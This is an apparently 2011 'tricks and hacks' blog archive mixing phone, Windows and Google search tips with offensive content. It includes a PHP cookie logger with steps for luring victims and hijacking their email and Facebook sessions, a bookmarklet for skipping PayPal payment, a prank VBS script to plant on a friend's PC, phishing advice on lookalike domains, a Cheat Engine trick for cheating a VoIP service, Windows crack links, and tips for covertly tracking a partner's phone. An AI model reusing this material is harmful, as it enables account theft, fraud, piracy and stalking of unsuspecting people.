Wednesday, April 20, 2011

Opera Hindi Browsing in Any Mobile

HINDI BROWSING IN ANY  MOBILE 
(s40,s60 or android  or windows or i phone)
WITH OPERA MINI type in  URL

config:?largeplaceholder=Yes&fittext=Yes&base_timeout=30&sitepatches=Yes&keeprssstyle=No&feedindex=Yes&folding=Yes&phonelinks=Yes&minimumphone=7&bitmapfonts=Yes

 Now You Have done it !!!!!!!!!!

Now close tab that's it
now you can browse any
hindi urdu or any other
language site you can
try in.jagran.yahoo.com

--------------
Its working and 100% tested.

Minimize Aplications In Nokia s40 Phones and hack it (Like Nokia3110 etc)

 ( This is a working trick in all s40 sets like nokia 3110 )
          JAF wrking link given at the end of my post on page 1 All- edit appropriate line (28 2 or 48 2) at the end of 1st line at last so that there should b 4 lines after editing and if u complete step 1 (upto disabling nokia security) ur phone is hacked nd it vil never ask 4 any permission like allow app to read write data in mmc. Yes no bla bla Applications can be minimized in Nokia S60 versions by pressing the Home Key. But in case of S40 it was impossible but there is a trick with which you can minimize the Java Applications in Nokia S40 as well.There are Basically some Major (But Easy) steps.

Steps.
1-Download JAF on pc.
2-Connect your Phone with pc in PC-Suite Mode.
3-Open JAF and go to BB5 Tab.
4-Tick the following.
a-Read pp.
b-Normal Mode.
c-CRT 308(Already Ticked).
5-Now Click Service.
6-Save the *.pp file on Desktop.
7-Open the *.pp file in Notepad.
8-In case the Phone is-
a-Nokia s40 v3 then Search for 28 1 line and change it to 28 2
b-Nokia s40 v5 or v6 then Search for 48 and change it to 48 2
c-In case there is no 48 or 28 then add the Appropriate line i.e 48 2 or 28 2.
9-Save the *.pp
10-Open JAF>BB5 Tab.
11-Tick the following:
a-Upload pp
b-Normal Modec CRT-308 (Already Ticked)
12-Click on Service.
13-Select the *.pp File.
14-After it shows Done, Select Normal Mode from the Drop Down Menu.
15-Phone will Restart and show Test in RNDIS USB mode? Press NO. This popup will be shown on every restart this is normal..

Now we have successfully disabled the Nokia Security wall.
Edit Java Application.
Steps
1-Copy the Java(.jar) application to the computer.
2-Open the *.jar file with WinRAR.
3-Browse to Meta-Inf Folder and Open it.
4-Open the Manifest.MF file in Notepad.
5-At the end of the codes add this line Nokia-MIDlet-no-exit: true
6-Save the notepad file.
7-Click on Yes when WinRAR asks to Update the Archive.
8-Copy the *.jar file to Nokia.

To Minimize the Application Open the application and press the Red button once.To Restore the Application Go to the folder where the application is and then press on the application once. Thats it.for jaf click here Download JAF

Sunday, April 17, 2011

Increase Virtual Memory

PLEASE NOTE! This can screw up your PC, I am not responsible for what happens.
1. Hold down the Windows Key and press the Pause/Break button at the top right of your keyboard (another way is right-clicking your computer and clicking Properties).
2. Click on the Advanced tab.
3. Under Performance, click Settings.
4. Then click the Advanced tab on the button that pops up.
5. Under Virtual Memory at the bottom, click Change.
6. Click the Custom Size button.
7. For the initial size (dependingon your HD space), type in anywhere from 1000-1500 (although i use 4000), and for the Maximum size type in anywhere from 2000-2500 (i use 6000).
8. Click Set, and then exit out of all of the windows.
9. Finally, restart your computer.
10. You now have a faster
computer and 1-2gb of virtual RAM

MAKE MOZILLA 10X FASTER

1. Type " about:config " into the address bar and hit enter. Scroll down and look for the following entries:
2. Alter the entries as follows:
Set " network.http.pipelining " to "true"
Set "network.http.proxy.pipelining" to "true"
set " network.http.pipelining.maxrequests " to some number like 30.

This means it will make 30 requests at once.



3. Lastly right-click anywhere and select New-> Integer. Name it "nglayout.initialpaint.delay "

and set its value to "0".
This value is the amount of time the browser waits before it acts on information it recieves.

NOTE:this trick only works for broadband users not for dialup

WINDOWS 7 OS ORIGINAL ISO DOWNLOAD

 >>>>This is my awesome post for  regular visitors of go2golas.blogspot.com<<<<

THESE ARE DIRECT DOWNLOAD LINKS AND ARE RESUME SUPPORTED.


32-bit Windows 7 Home Premium x86 ISO


click here


64-bit Windows 7 Home Premium x64 ISO


click here


32-bit Windows 7 Professional x86 ISO


click here


64-bit Windows 7 Professional x64 ISO


click here




AND WINDOWS 7 ALL VERSION CRACK IS ALSO HERE


REMOVE WAT 2.2.6.RAR

Remove virus manually in windows

Removing virus manually in windows XP

Begginning of tut:

Start->Run->type cmd
in each drive type attrib /s /d it will display the list of all files in that drive along with folders.concntrate on files having SHR attribute.normally virus files have two characteristics
1.SHR attribute
2.Queer name like amvo.exe,r6r.exe,autorun.inf etc.

Note:some system files also have this attribute like MSDOS.SYS,IO.SYS etc so before deleting googling about that file will help.

to delete these files type c:>del /f /s /a

>> to view the content of files with .inf,.vbs,.c etc i.e files which r not batch files or executables.goto explorer n then goto the required drive or folder n type the filename with extension it wil open up in notepad.

>>there is another method also.goto the required location n type attrib -s -h -r filename
then use gui to see that hiiden file.if it is not n exe or .bat or then open it with notepad.Here you will get some information like a file name or a registry key which the virus affects or a startup item or process.Change this or uncheck the startup.

if file is not deleted like it says access denied it means it already used by some process.open task manager n find a process of the same name or some process which is not a valid windows process(better google) n end that process.

if not found open msconfig goto statrup tab n look at if a startup items seems queer(u wil have this feeling if u r n experienced windows user otherwise all da startup items may seem queer.)uncheck that.u may also learn about da startup item by googling.after unchecking restart the computer then restart the computer.

This method is effective in removing some spywares or some small but annoying virii like maskrider etc. which r sometimes not detected by antivirus softwares.

Saturday, April 16, 2011

Funny VIrus Code

It will not harm your computer it is only for fun, if you wants to disturb your friends PC just Copy and Past this file and double click on it...
CODE:
-----------------------------

Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If

****************************************

copy this into notepad and save it as anyname.vbs like virus.vbs
and then double click on it...what u see....bingo

Now if u want to disable this go to task manager click on process
then find wscript.exe and end this process

Show Your Massage To The User

To Show  a banner which can contain any message you want to display just before a user is going to log on.

Go to the key :- GoTo Run> Type REGEDIT > HKEY_LOCAL_MACHINE > SOFTWARE > MicrosoftWindowsCurrentVersion> WinLogon
Now create a new string Value in the right pane named 'LegalNoticeCaption' and enter the value that you want to see in the MenuBar.

Now create yet another new string value and name it:
'LegalNoticeText'.
Modify it and insert the message you want to display each time Windows boots.

This can be effectively used to display the company's private policy each time the user logs on to his NT box.

It Is Very Funny, You Can Display Text What You Wants to say or Welcome to user.

Change Proccesor Name


1ST

GO TO

START>

RUN>

TYPE REGEDIT>

HKEY_LOCAL_MACHINE>

HARDWARE>

DISCRIPTION>

SYSTEM>

CENTRAL PROCESSOR>

ON RIGHT HAND SIDE  RIGHT CLICK ON  PROCESSOR NAME STRING
AND THEN WRITE  ANYTHING U WANT IN  THAT TEXT BOX,
 
Now Check Your My computer Property.
ENJOY!!!

Friday, April 15, 2011

Unlock Browsing speed in ur Windows Xp

Hi friends,
just use this method to unlock browsing speed in Windows Xp >>>
Go to Run Type, REGEDIT
now go to --
HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current Version/Explorer/RemoteComputer/NameSpace
Select the key
{D6277990-4C6A-11CF-8D87-00AA0060F5BF}
& delete it.
this key,instructs Windows to search for Scheduled Tasks.
ok .just do it n enjoy .

Maintenance Tips for your Computer

The computer is one of the most important inventions to have taken place in the 20th century, which has grown over several decades contributing to the growth and changes in human learning and behavior. Today the computer is an essential part of human life without which they cannot do their day-to-day tasks.

This amazing machine has made life easier for most people and contributed to their overall growth. Today almost all household have at least one computer but the most important question that arises here is, if the owner is concerned about the proper maintenance of the machine or not.

Most people either fail or forget to properly maintain their computer from both internal and external threats that can seriously jeopardize the functioning of the machine. However, with just a few important tips you can effectively maintain your computer and can keep its functioning as good as ever.

Here are a few essential maintenance tips to keep your computer stable and in a perfect condition:

1. Perform a disk clean up for maintaining the speed of your computer. Running regular disk clean up can clean your system of unnecessary data. This step can be done manually or by running the disk cleanup utility in Windows.

2. Running a registry cleaning software can relieve your system from obsolete and corrupt entries in the registry file. A clogged registry can severely hamper the performance of your system and can even cause it to crash. So, it is important to clean your Windows registry at regular intervals.

3. By using an Anti-Spyware program you can clean your system from malicious programs that intend to steal your data and cause your system to clog.

4. Viruses are one of the most common and serious threat to computers and using a good updated Anti-virus program will help your computer to rid itself from harmful viruses.

5. Lastly, you need to clear all un-important software installed on your computer as they cause a lot of trouble during the Windows startup process and make the process a rather clumsy one.

By following these simple steps you can effectively shield your computer from all internal and external threats.

Nokia Secret Codes

Nokia secret codes
→ *#06# IMEI (International Mobile Equipment Identity) 
→ *#67705646# This will clear the LCD display (operator logo) 
→ *#7780# Reset to factory settings 
→ *#2820# Bluetooth device address 
→ *#62209526# Display MAC address device support WLAN like N 80 #pw+1234567890+1# shows if   sim have restrictions 
→ *#746025625# sim clock allowed status 
→ *#7370925538# Note, your data in the wallet will be erased phone will ask you the lock code default      lock code is 12345 press
→ *#3925538# to delete the contents and code of wallet
*#7328748263373738# reset security code default security code is 12345 
→ *#4720# Half rate codec Activation
→ *#4720* Half rate codec Deactivation

Get Notified When Your Facebook Account Get Hacked

            These days hackers and some other are so smart that may steal your account passwords and you never get to know about it, as they keep on logging to your account from other computers without your knowledge and peek into your account without your permission

In order to get rid to this worry that whether some one else is using your Facebook account, you should better enable the security option in Facebook which allows you to register your computers and mobile phone from where you access your Facebook account.

So, if any one else login to your account from some other computer other than the registered one or the some other mobile phone other than your registered mobile phone you will get notified via email.

Follow the procedure below which shows how to enable this security feature in Facebook


1. Login to Facebook in any Internet browser

2. Go to Facebook Account Settings


3. Locate Account Security under Settings – check yes to enable this feature and click submit button.

4. Next time you login to Facebook it will ask you register your computer, you will need to enter your PC name.

Note: Now when someone else login to your account, you will get notified via email and via SMS also if you are subscribed for it.

Interact with your pc by talking


This software lets you interact with your pc just by talking!!
It understands what you say and how you say it. Speak words and they appear on the screen — three times faster than typing. Tell your PC what to do and it does it.
Speak Commands and Your Computer Obeys
Just tell your computer what you want to do, such as "Delete line," "Copy that," "Make that red," or "Open Microsoft Word," and Dragon will complete the task.
The Dragon Sidebar lets you see helpful voice commands and tips at anytime without interrupting what you’re..
Download Torrent Here

Thursday, April 14, 2011

All OS Keys

            Dear user here is new rocking hack... You can find any operating system keys and patch here.. just download this file..  Click Here..

Wednesday, April 13, 2011

Free SMS Worldwide

Dear Friends this is my new research of sending free SMS worldwide absolutely free, you don,t need of any User name or Sign Up, no hack or trick, just click on this link and you will be redirected to that site...Just Click  Click Here on this link..it will send Massages within seconds just like your cellphone,If any doubts then send SMS on your Mobile No. first....

Th€ 5 S@cr@ts Ph!$h!ng success

1. THE SUBJECT LINE

The subject line of an email is much like your first impression - you will get away with nearly anything if you have a good one, and you'll rarely ever recover if you have a bad one. Unfortunately, most of us write bad email subject lines - our subject lines in SE situations tend to be vague and unimaginative.

While it's a natural instinct to want to be as unobtrusive as possible (i.e. when performing most SE engagements, we don't exactly strive to be memorable), this is exactly the logic that will get your emails moved immediately to the "trash" folder (especially if you do a bad job with the next four secrets).

Of course, the subject of the email has to be relevant to what you’ re attempting. If it's not, then you're going to be remembered (and you're going to get reported to the local security team by any moderately responsive workforce).
Phishing Scenario

Typical Subject Line

Good Subject Line

Fake Administrative Update Security Update Important: Patch Your Computer
Malicious PDF Document from a colleague The Documents you Requested Can you believe that he sent me this?
Direct to an entertaining malicious web link You should see this site Have you seen this one?

2. THE EMAIL ADDRESS

The number of phishing attacks that fail because the email address is too "phishy" probably is nearly innumerable. Many of us intuitively understand this and choose phishing emails that appear to come from the target domain; however, this can limit our ability to perform some of the scenarios that we may hope to accomplish.

This can all be avoided with heavy use of your GoDaddy (or other domain registrar) account and some creativity. Some ideas we have tossed around to make incredibly effective phishing email addresses have included the obvious ones (e.g. .net / .org analogues of our clients' domains) as well as some more esoteric tricks to replicate domains (internationalized domain names that have foreign characters that appear similar to the domain we're attempting to replicate).

An interesting one that we've actually used (effectively) was against a customer who we knew to be heavily dependent on Oracle products within their environment. In attacking their IT staff, we knew that a link sent from Oracle was likely to be acted on quickly. Of course, appearing as though we were Oracle was going to be somewhat difficult. We also realized that the letters "c" and "l" placed next to each other look very much like a "d." So, we registered the domain "orade-support.com" (because "orade.com" was taken).

If you're creative, you can come up with any number of opportunities like this given who you're trying to impersonate.

3. SALUTATIONS

The salutation of an email tells us much about the sender and their intent. This all goes back to the way that we learned about letter writing when we were growing up – the difference between "Dear Mike," "Hi Mike" "Mike" and "To whom it may concern" is pronounced in our understanding of what is to follow.

This is one of the fundamental failures of most traditional phishing emails sent from overseas (especially those countries with school systems based on British English like India and Nigeria) – they tend to be far more deferential and formal in their salutations than those in the US and Canada are. Imagine, for example, you are sitting at work and get an email from a co-worker that begins with, "Dear Esteemed Colleague." How suspicious would you be?

Similarly, choosing the correct salutation for your email (and, often, the answer "no salutation" is the right one) is required to ensure that your emails don't set off the target's suspicion.

4. SIGNATURES

Much like the salutation, we learned from a young age that we needed to sign our letters. Consequently, our reaction to the signature of an email is impressed deeply on our unconscious minds. The right signature can soothe a budding suspicion, while the wrong one will set off alarm bells in even the most otherwise perfect email. As an example, take one of the companies that you interact with often (e.g. Paypal, Google, eBay, etc.) and examine the signatures that accompany each.

You will likely discover a constancy of signature across the emails that unconsciously reassures you of who you're dealing with. Likewise, you probably will notice that your friends all sign their emails in a similar way each time.

For example, anyone receiving an email from me will notice that my notes are signed "-Mike" or "-M" nearly every single time.

When I don’ t sign my notes that way, people notice. And anybody attempting to impersonate me had better get that right.

5. TESTING YOUR EMAILS 

There are two types of tests that every phishing email should be put through, before it hits the wire to ensure that it has the best chance of success. The first test is to ensure that your email will reach its target, while the second is about ensuring that you're being as appropriate as possible in the way that you write your email.

Saturday, April 9, 2011

Hack Facebook Gmail Account

Well one of the question which is asked most to me is,"How to hack into an email account",So today i am posting a new way to hack into an email account,I am not posting this post to exite hackers but to make you aware of whats going around
Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.
What is a CookieLogger?
A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.
Today I am going to show How to make your own Cookie Logger
How to hack into an email account
step 1:First you have to create a file which can capture a person's cookie.So follow the following process.
Step 2:Now you have to change" http://go2goals.blogspot.com/ "to your your site.
Remember one thing you should not upload the files into a directory.
Now open notepad and paste the script in it and save it as fun.gif
step 3:Copy the Following Script into a Notepad File and Save the file as cookielogger.php:
$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>

Step 4:Create a new Notepad File and Save it as logfile.txt
Upload this file to your server
cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif
If you don’t have any Website then you can use the following Website to get a Free Website which has php support :
www.ofees.net
www.t35.com
www.ripway.com
Step 5: NOW FORCE VICTIM TO OPEN THIS PAGE
http://www.yoursite.com/fun.gif
Step 6:So if he/she click the image he/she will get a temporary error and you will find the cookie in the logfile.txt
step 7:And something like this will be stored in your "logfile.txt"


phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9


Step 8:To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.


Now for this you will need a firefox addon named
"Add and edit cookies"


Warning:This post "How to hack into an email account:cookie logger is truly for educational purposes i dont take responsibility for how you use it

Friday, April 8, 2011

ByPass Paypal Payment For Free

Hi friends I hope you all are fine, I am again here with new tricks and hack for "Paypal" which will also tought one lession of hacking and more. Now you can free softwares, e-books, games, etc form weak websites without giving them paypal payment. That is Bypassing Paypal Payment.

Just Follow This Little Steps And Bypass Paypal Payment For Free
Just add the following in bookmark, or copy/paste it.

javascript:top.location=document.getElementsByName('return')[0].value; javascript:void(0);

When you are visiting a page using a paypal payment button, just click the bookmark or paste the above code in the URL bar of your navigator.
If it works, you will be redirected to the download page Else, try another site (or buy it )
A link the script works on : http://www.ptcexpert.com
Try script on above website and If you find another link, please share, You can find many more website from google search .

Free Calling World Wide For Free

I am here with a new tutorial for you. I know that each and everybody wants to call for free. With most VoIP services, you can make unlimited free phone calls anywhere but only under one condition. The condition is that you can only talk for a certain time, like 10 seconds or so, or you need to be calling someone on the same service.
In this tutorial i am going to show you how to make free world wide phone calls and talk as long as you like. Lets start: First of all download FriendCaller from Here After it is fully installed, open friend caller from desktop. Then register. I recommend you to use temporary email for the registration, like yopmail.com
Then go to your email and confirm your account and you will be credited $ 0.10 for free calls. So you can only call for 10 seconds for free but this what I made this tut so you can call free.
Now login with your account.
Then click on the phone icon.
Now comes the great part. Download a software called Cheat Engine from Here

Run the software and click on "Open Process"
Then click on window list.
Select friend caller, and open it.
Now dial number in friend caller. [First test your own number] and click call. It will start ringing...
Now in Cheat Engine, enable speed hack. Edit speed to 0.00
Now enjoy your call. The timer will freeze. You can talk as much as you want. When you finish call, you will be only charged 0.02 but after your balance is finished, make new account and enjoy.

Unblock Hidden Themes In Windows7


Windows 7 has been a real delight for the eyes due to its excellent graphics.By defualt Windows 7 has 5 themes enabled for all countries but there are additional themes which are country specific and enabled according to your demographic location.Here i will show you how to enable/unlock the country specific hidden themes in windows 7.Once enabled these themes will always be available to you.The best method is explained here on OUR SITE.It enable these hidden themes
METHOD:
1.Open Notepad 
2.Copy and Paste the following code into it.
Windows Registry Editor Version 5.00 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Themes\InstalledThemes\MCT] “%windir%\\Globalization\\MCT\\MCT-AU\\Theme\\AU.theme”=”” “%windir%\\Globalization\\MCT\\MCT-CA\\Theme\\CA.theme”=”” “%windir%\\Globalization\\MCT\\MCT-GB\\Theme\\GB.theme”=”” “%windir%\\Globalization\\MCT\\MCT-US\\Theme\\US.theme”=”” “%windir%\\Globalization\\MCT\\MCT-ZA\\Theme\\ZA.theme”=”” [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Wallpapers\KnownFolders\Windows Wallpapers\MergeFolders] “%windir%\\Globalization\\MCT\\MCT-AU\\Wallpaper”=”” “%windir%\\Globalization\\MCT\\MCT-CA\\Wallpaper”=”” “%windir%\\Globalization\\MCT\\MCT-GB\\Wallpaper”=”” “%windir%\\Globalization\\MCT\\MCT-US\\Wallpaper”=”” “%windir%\\Globalization\\MCT\\MCT-ZA\\Wallpaper”=”” 
3.Save it with the name allregional.reg
4.Now double click on it.It will ask for your permission to add the file to registry.Click on Yes.
5.Right click on desktop and select personolize.You new themes will be available to you.

Trace & Spy Your GF Mobile

Trace & SPY Your GF Mobile Live For Free Instantly
Yes Guys, this is now possible...I m not jokingMany of us think that this is not possible or we have to spend some money for such services but believe me that we don’t have to spend any money for getting this done. Yes, PhoneOnMap.com makes it possible, which provides a free application that has to be installed in GPS cell phone and you are ready to track the phone from anywhere on the Internet.
This application can be useful for office work as well as family members. You can track your child as well as your girlfrend/wife too (LOL) . This PhoneOnMap.com can be used worldwide and you can use it while travelling too. The data is stored on the company’s server for a period of one month. This can be an invaluable source for sales and marketting department of an organization to track the marketing agents.
If you are worried about the security and privacy of the service, let me tell that it is very secure and your cell phone can not be monitored by any Unauthorized User as in order to access the tracking system, you have to authenticate yourself through a personal code which was used as identification while installingapplication on cell phone.

Features of GPS cell phone tracking system :-
1. GPS cell phone tracker and locater will not work in the underground transportation .
2. The application does not work when the phone is turned off.
3. The data transmission outside provider’s coverage area will add roaming charges like any other phone service charge us .
4. Once application is uninstalled from cell phone than you can’t do anything .
5. On internet tracking system will show cell phone location between every 10 seconds to 10 minutes , which is depend on setting .
Accordng to me this kind of service is very important for parents to track their children and from a business usage point of view an invaluable part of companies involved in supply and delvery system like Courrier and Home delivery system. This will help them to get a realtime location of the object and provide an accurate timeframe for the delivery.
As of now this service does not provide the exact pin point location but the location determined s in the range of 10-20 meters. However with little intelligence the exact location can be easily determined especially when you wish to track your children or the cheating girlfrend…(lol)

Google Tricks-D

75. Search locally by appending your postcode to the end of query. For example Indian food BA1 2BW finds restaurants in Bath, with addresses and phone numbers!
76. Looking for a map? Just add map to the end of your query, like this: Leeds map
77. Google finds images just as easily and lists them at the top, when you add image to the end of your search.
78. Google Image Search recognises faces... add &imgtype=face to the end of the returned URL in the location bar, then hit enter to filter out pictures that aren't people.
79. Keeping an eye on stocks? Type stocks: followed by market ticker for the company and Google returns the data from Google Finance.
80. Enter the carrier and flight number in Google's main search box to return flight tracking information.
81. What time is it? Find out anywhere by typing time then the name of a place.
82. You may have noticed Google suggests alternate spellings for search terms - that's the built in spell checker!
83. You can invoke the spell checker directly by using spell: followed by your keyword.
84. Click "I'm Feeling Lucky" to be taken straight to the first page Google finds for your keyword.
85. Enter a statistics-based query like population of Britain into Google, and it will show you the answer at the top of its results.
86. If your search has none-English results, click "Translate this Page" to see it in English.
87. You can search foreign sites specifically by clicking "Language Tools", then choosing which countries sites to translate your query to.
88. Other features on the language tools page include a translator for blocks of text you can type or cut and paste.
89. There's also a box that you can enter a direct URL into, translating to the chosen language.
90. Near the language tools link, you'll see the "Search Preferences". This handy page is full of secret functionality.
91. You can specify which languages Google returns results in, ticking as many (or few) boxes as you like.
92. Google's Safe Search protects you from explicit sexual content. You can choose to filter results more stringently or switch it off completely.
93. Google's default of 10 results a page can be increased to up to 100 in Search Preferences, too.
94. You can also set Google to open your search results in a new window.
95. Want to see what others are searching for or improve your page rank? Go to www.google.com/zeitgeist
96. Another useful, experimental search can be found at www.google.com/trends - where you can find the hottest search terms.
97. To compare the performance of two or more terms, enter them into the trends search box separated by commas.
98. Fancy searching Google in Klingon? Go to www.google.com/intl/xx-klingon
99. Perhaps the Swedish chef from the muppets is your role model instead? Check www.google.com/intl/xx-bork
100. Type answer to life, the universe and everything into Google. You may be surprised by the resul

Google Tricks-C

51. Try searching for weather London - you'll get a full 4-day forecast.
52. There's also a built-in dictionary. Try define: in the search box.
53. Google stores the content of old sites. You can search this cache direct with the syntax keyword cache:site_url
54. Alternatively, enter cache:site_url into Google's search box to be taken direct to the stored site.
55. No calculator handy? Use Google's built in features. Try typing 12*15 and hitting "Google Search".
56. Google's calculator converts measurements and understands natural language. Type in 14 stones in kilos, for example.
57. It does currency conversion too. Try 200 pounds in euros
58. If you know the currency code you can type 200 GBP in EUR instead for more reliable results.
59. And temperature! Just type: 98 f to c to convert Fahrenheit to Centigrade.
60. Want to know how clever Google really is? Type 2476 in roman numerals, then hit "Google Search"...
61. You can personalise your Google experience by creating a Google account. Go to www.google.com/account/ then click "Create Account".
62. With a Google account there are lots more extras available. You'll get a free Gmail email account for one...
63. With your Google account, you can also personalise your front page. Click "iGoogle" to add blog and site feeds.
64. Click "Add a Tab" in iGoogle

Google Trick-B

26. The modifier inurl only searches the web address of a page: give inurl:spices a go.
27. Find live web cams by searching for: in url:view/view.shtml
28. The modifier in anchor is very specific, only finding results in text used in page links.
29. Want to know how many links there are to a site? Try link:siten ame - for example link:www.mozilla.org
30. Similarly, you can find pages that Google thinks are related in content, using the related: modifier. Use it like this: related:www.microsoft.com
31. The modifier info:site_name returns information about the specified page.
32. Alternatively, do a normal search then click the "Similar Pages" link next to a result.
33. Specify a site to search with the site: modifier - like this: search tips site:www.techradar.com
34. The above tip works with directory sites like www.dmoz.org and dynamically generated sites.
35. Access Google Directory - a database of handpicked and rated sites - at directory.google.com
36. The Boolean operators intitle and inurl work in Google directory, as does OR.
37. Use the site: modifier when searching Google Images, at images.google.com. For example: dvd recorder site:www.amazon.co.uk
38. Similar, using "site:.com" will only return results from .com domains.
39. Google News (news.google.com) has its own Boolean parameters. For example "intext" pulls terms from the body of a story.
40. If you use the operator "source:" in Google News, you can pick specific archives. For example: heather mills source:daily_mail
41. Using the "location:" filter enables you to return news from a chosen country. location:uk for example.
42. Similarly, Google Blogsearch (blogsearch.google.com) has its own syntax. You can search for a blog title, for example, using inblogtitle:
43. The general search engine can get very specific indeed. Try movie: to look for movie reviews.
44. The modifier film: works just as well!
45. Enter showtimes and Google will prompt you for your postcode. Enter it and it'll tell you when and where local films are showing.
46. For a dedicated film search page, go to www.google.co.uk/movies
47. If you ticked "Remember this Location" when you searched for show times, the next time you can enter the name of a current film instead.
48. Google really likes movies. Try typing director: The Dark Knight into the main search box.
49. For cast lists, try cast: name_of_film
50. The modifier music: followed by a band, song or album

Google Trick-A


1. The best way to begin searching harder with Google is by clicking the Advanced Search link.
2. This lets you search for exact phrases, "all these words", or one of the specified keywords by entering search terms into the appropriate box.
3. You can also define how many results you want on the page, what language and what file type you're looking for, all with menus.
4. Advanced Search lets you type in a Top Level Domain (like .co.uk) in the "Search within site of domain" box to restrict results.
5. And you can click the "Date, usage rights, numeric range and more" link to access more advanced features.
6. Save time - most of these advanced features are also available in Google's front page search box, as command line parameters.
7. Google's main search invisibly combines search terms with the Boolean construct "AND". When you enter smoke fire - it looks for smoke AND fire.
8. To make Google search for smoke or fire, just type smoke OR fire
9. Instead of OR you can type the | symbol, like this: smoke | fire
10. Boolean connectors like AND and OR are case sensitive. They must be upper case.
11. Search for a specific term, then one keyword OR another by grouping them with parentheses, like this: water (smoke OR fire)
12. To look for phrases, put them in quotes: "there's no smoke without fire"
13. Synonym search looks for words that mean similar things. Use the tilde symbol before your keyword, like this: ~eggplant
14. Exclude specific key words with the minus operator. new pram -ebay excludes all results from eBay.
15. Common words, like I, and, then and if are ignored by Google. These are called "stop words".
16. The plus operator makes sure stop words are included. Like: fish +and chips
17. If a stop word is included in a phrase between quote marks as a phrase, the word is searched for.
18. You can also ask Google to fill in a blank. Try: Christopher Columbus discovered *
19. Search for a numerical range using the numrange operator. For example, search for Sony TV between Ð300 and Ð500 with the string Sony TV Ð300..Ð500
20. Google recognises 13 main file types through advanced search, including all Microsoft Office Document types, Lotus, PostScript, Shockwave Flash and plain text files.
21. Search for any filetype directly using the modifier filetype:[filetype extension]. For example: soccer filetype:pdf
22. Exclude entire file types, using the same Boolean syntax we used to exclude key words earlier: rugby -filetype:doc
23, In fact, you can combine any Boolean search operators, as long as your syntax is correct. An example: "sausage and mash" -onions filetype:doc
24. Google has some very powerful, hidden search parameters, too. For example "intitle" only searches page titles. Try intitle:herbs
25. If you're looking for files rather than pages - give index of as the intitle: parameter. It helps you find web and FTP directories.